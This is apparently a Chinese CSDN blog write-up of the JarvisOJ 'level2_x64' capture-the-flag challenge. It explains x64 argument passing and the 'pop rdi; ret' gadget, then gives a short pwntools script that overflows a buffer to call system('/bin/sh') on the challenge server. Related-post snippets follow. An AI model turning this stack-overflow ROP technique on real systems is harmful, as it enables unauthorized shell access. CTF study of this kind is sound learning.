PWN_JarvisOJ_Level2_x64

最新推荐文章于 2024-07-05 00:58:41 发布
最新推荐文章于 2024-07-05 00:58:41 发布
阅读量1.4k 收藏 5
点赞数 6
分类专栏: PWN学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/michaelinfinity/article/details/88584349
版权

关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。

32位的函数在调用栈的时候是:

       调用函数地址->函数的返回地址->参数n->参数n-1....->参数1

64位的函数在调用栈的时候是:

       前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。

       参数超过六个的时候,第七个会压入栈中,并且先输入函数的返回地址,然后是函数的参数,之后才是函数的调用地址

然后是/bin/sh 和 system函数的地址

之后用ROPgadget来获取ret的地址

pop rdi; ret的意思是pop掉栈顶元素,并压入栈中,ret返回栈。

我当时考虑过,它会把什么压入栈中呢,然后想了一下就是这样的。

这个是vulnerable_function函数的栈,其中buf占了80个字节,r有8个字节。那么我们来想想一下,我们把payload全部送进去后,一定是填充了这个函数的堆栈,那么是怎么填充的呢

地址会继续往下走,那么在pop掉前面的‘a’之后便是pop下一个ropgadget出来的地址,然后就是栈顶的/bin/sh的地址被pop掉并放在rdi中。

from pwn import *

p=remote('pwn2.jarvisoj.com',9882)
payload=(0x88)*'A'+p64(0x4006b3)+p64(0x600A90)+p64(0x4004C0)
p.sendline(payload)
p.interactive()

michaelinfinity
关注
专栏目录
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
2. ARM7汇编代码:可能包括更底层的定时器控制和中断处理函数,这些函数可能直接操作硬件寄存器以实现PWM功能。 学习和理解这些代码,可以帮助开发者深入掌握ARM7处理器上的PWM接口实现,以及如何在汇编和C语言之间...
jarvisoj_level2_x64
zip471642048的博客
06-24 579
题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 302
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
【BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 419
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
jarvis oj level2-x64
CNXBDSa的博客
07-27 401
栈溢出大佬总结详情 好了说说做这题的过程 思路和个人见解吧 首先明白32位和64之间的传参的差距 32位通过栈来进行传参 64位是通过寄存器来传参 -----函数参数的传递方式发生了改变,x86(32位)中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。 第一步我们还是checksec查看...
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 375
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 374
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
JarvisOJ level2x64
PLpa的博客
07-09 531
这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64的 前言: 首先,我们先看一下x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的前六个参...
jarvisoj_level2
m0_55086916的博客
11-29 667
第一个p32(0x08048320)是function函数的返回地址,第二个是system函数的返回地址,p32(0x0804a024)是system函数的第一个参数。注意到这里可以利用栈溢出漏洞,buf数组只给了0x88的大小,但是最多可以读入0x100个字节的数据,所以多读入的数据就会向下把栈给覆盖掉。于是想把function函数的返回地址覆盖成system函数的入口地址,然后把参数改成"bin/sh"字符串的地址。
jarvisoj_level2【BUUCTF】
qq_41696518的博客
08-26 726
jarvisoj_level2【BUUCTF】
jarvisoj-level2
qq_35661990的博客
11-09 1382
只开了NX,栈上不可执行 main函数 vulnerable_function(); system("echo 'Hello World!'"); return 0; function函数 char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x10...
jarvisoj_level2[BUUCTF]
moonlightsunshin的博客
05-09 210
从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出,IDA会告诉我们buf数组与ebp在栈上的相对位置,即&buf=$ebp-0x88,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且system()的地址可以轻松在plt表中找到,为0x08048320,因此我们只需要在构造一个shell路径的字符转就可以getshell了。
[CTF]jarvisoj_level2
凉水的博客
01-12 511
解题思路 反编译后的源码: undefined4 main(void) { vulnerable_function(); system("echo \'Hello World!\'"); return 0; } void vulnerable_function(void) { undefined local_8c [136]; system("echo Input:"); read(0,local_8c,0x100); return; } 看完上面的反编译,直觉system函数
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值